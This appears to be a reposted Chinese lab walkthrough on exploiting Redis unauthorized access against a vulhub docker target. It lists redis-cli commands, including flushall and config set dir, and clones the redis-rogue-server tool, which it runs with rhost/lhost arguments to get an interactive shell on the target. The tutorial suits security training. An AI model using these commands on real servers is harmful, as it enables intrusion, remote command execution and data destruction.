当前位置:   article > 正文

Redis未授权访问漏洞

Redis未授权访问漏洞

Redis未授权访问漏洞

靶场IP:192.168.30.138
kali的IP:192.168.30.129

搭建靶场环境

进入目录:cd/vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps
vi docker-compose.yml  //查看端口和版本号
  • 1
  • 2
  • 3
  • 4

在这里插入图片描述
开启成功
在这里插入图片描述

安装redis工具

在kali上安装redis进行服务链接

#安装redis
apt-get install redis

#redis使用
redis-cli -h 192.168.30.137  -p 6379

#redis常见命令
	(1)查看信息:info
	(2)删除所有数据库内容:flushall
	(3)刷新数据库:flushdb(3)
	(4)看所有键:KEYS *,使用select num可以查看键值数据:
	(5)设置变量:set test"whoami"
	(6)config set dir dirpath 设置路径等配置
	(7)config get dir/dbfilename 获取路径及数据配置信息
	(8)save保存
	(9)get 变量,查看变量名称
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16

在这里插入图片描述

步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞----->下载以下攻击项目…
https://github.com/n0b0dyCN/redis-rogue-server
可以下载git源码或者压缩包

 git clone https://github.com/n0b0dyCN/redis-rogue-server.git 
  • 1

步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境

python3 redis-rogue-server.py --rhost 192.168.30.138 --lhost 192.168.30.129

  • 1
  • 2

在这里插入图片描述
然后就可以输入命令获取信息了
在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/黑客灵魂/article/detail/930221
推荐阅读
相关标签
  

闽ICP备14008679号